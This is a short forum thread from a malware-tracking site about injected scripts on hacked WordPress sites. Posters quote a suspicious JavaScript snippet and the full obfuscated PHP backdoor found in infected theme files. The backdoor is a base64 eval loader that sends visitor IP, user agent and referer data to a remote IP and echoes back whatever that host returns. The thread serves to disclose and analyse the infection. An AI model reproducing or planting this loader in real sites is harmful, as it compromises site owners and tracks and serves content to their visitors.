Malware Domain List
Malware Related => Malware Analysis => Topic started by: foks on September 09, 2011, 06:50:40 am
-
On some sites I have seen a new javascript starting with <script id="googleblogcontainer">. You can see the entire script on http://sakrare.ikyon.se/log.php?id=12396.
The script is encrypted and requests the file http://91.196.216.30/counter.php. That script seems very innocent:
function remove(element) {
var parent = element.parentNode;
parent.removeChild(element);
}
var my = document.getElementById('googleblogcounter');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
var my = document.getElementById('googleblogcontainer');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
I have not been able to find out what the script tries to do next. 91.196.216.30 is not blacklisted in Google but is on same network as counter-wordpress.com and superpuperdomain2.com. 91.196.216.30 has also been used in the TimThumb attacks against Wordpress sites.
-
The wordpress hacking continue
In all my index files and wordpress theme files i have this >:(
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
Decoded to
<?php $url = 'hxxp://91.196.216.30/bt.php'; ?>
Just google 'hxxp://91.196.216.30/bt.php' and see the infected site results :-[